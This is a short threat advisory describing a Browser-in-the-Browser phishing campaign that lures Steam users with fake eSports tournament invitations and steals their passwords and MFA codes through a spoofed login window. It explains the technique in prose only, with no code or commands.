Threat actors are using new phishing techniques to steal credentials to the digital gaming platform Steam with the intent to sell them to other users. The phishing technique used is known as a Browser-in-the-Browser attack, a sophisticated technique involving the creation of fake browser windows within the active window.
In these campaigns, targeted users receive direct messages on Steam inviting them to join a tournament for a popular video game. This message includes a link to a website for what appears to be an organization hosting eSports competitions and requires users to log in to their Steam account to sign up. This triggers what appears to be a new browser window to open, containing the login page for Steam. This window, however, isn’t a new browser window and is instead a fake window created within the current page. The fake window is mirrored to look like the Steam login page, including the legitimate Steam URL in the address bar as well as the HTTPS secure lock, but when any credentials are entered, they are sent to the threat actor instead. These pages are sophisticated enough to be able to prompt for and steal MFA codes as well. Once the authentication process has been successful, the webpage redirects the web browser to a legitimate address in an attempt to hide the fact that credentials were just stolen.
At this point, the threat actors quickly hijack the Steam accounts, changing passwords and email addresses to make it more difficult for victims to regain access. This phishing method, using Browser-in-the-Browser attacks, is gaining in popularity among threat actors due to its sophisticated nature and users’ difficulty in determining that it is a phishing attempt.